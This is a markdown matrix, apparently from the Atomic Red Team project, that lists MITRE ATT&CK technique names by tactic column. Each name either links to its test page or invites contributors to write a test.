| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md) | Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Credentials from Password Stores: Keychain](../../T1555.001/T1555.001.md) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Network Sniffing](../../T1040/T1040.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Direct Volume Access](../../T1006/T1006.md) | [Forge Web Credentials: SAML token](../../T1606.002/T1606.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data from Cloud Storage Object](../../T1530/T1530.md) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Deploy a container](../../T1610/T1610.md) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [Application Window Discovery](../../T1010/T1010.md) | Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Active Setup](../../T1547.014/T1547.014.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Network Sniffing](../../T1040/T1040.md) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Cloud Infrastructure Discovery](../../T1580/T1580.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
| | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bash History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [System Services: Launchctl](../../T1569.001/T1569.001.md) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cloud Storage Object Discovery](../../T1619/T1619.md) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
| | XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Private Keys [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | [Data from Network Shared Drive](../../T1039/T1039.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Process Discovery](../../T1057/T1057.md) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Encrypted Channel](../../T1573/T1573.md) | |
| | Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Process Injection](../../T1055/T1055.md) | Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hide Artifacts](../../T1564/T1564.md) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | |
| | Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Escape to Host](../../T1611/T1611.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Query Registry](../../T1012/T1012.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) | | Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [Cloud Service Discovery](../../T1526/T1526.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [Inter-Process Communication](../../T1559/T1559.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | [Remote System Discovery](../../T1018/T1018.md) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | [User Execution: Malicious Image](../../T1204.003/T1204.003.md) | [Browser Extensions](../../T1176/T1176.md) | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Network Service Discovery](../../T1046/T1046.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Software Discovery](../../T1518/T1518.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Steal Application Access Token](../../T1528/T1528.md) | [System Time Discovery](../../T1124/T1124.md) | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | | | | | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
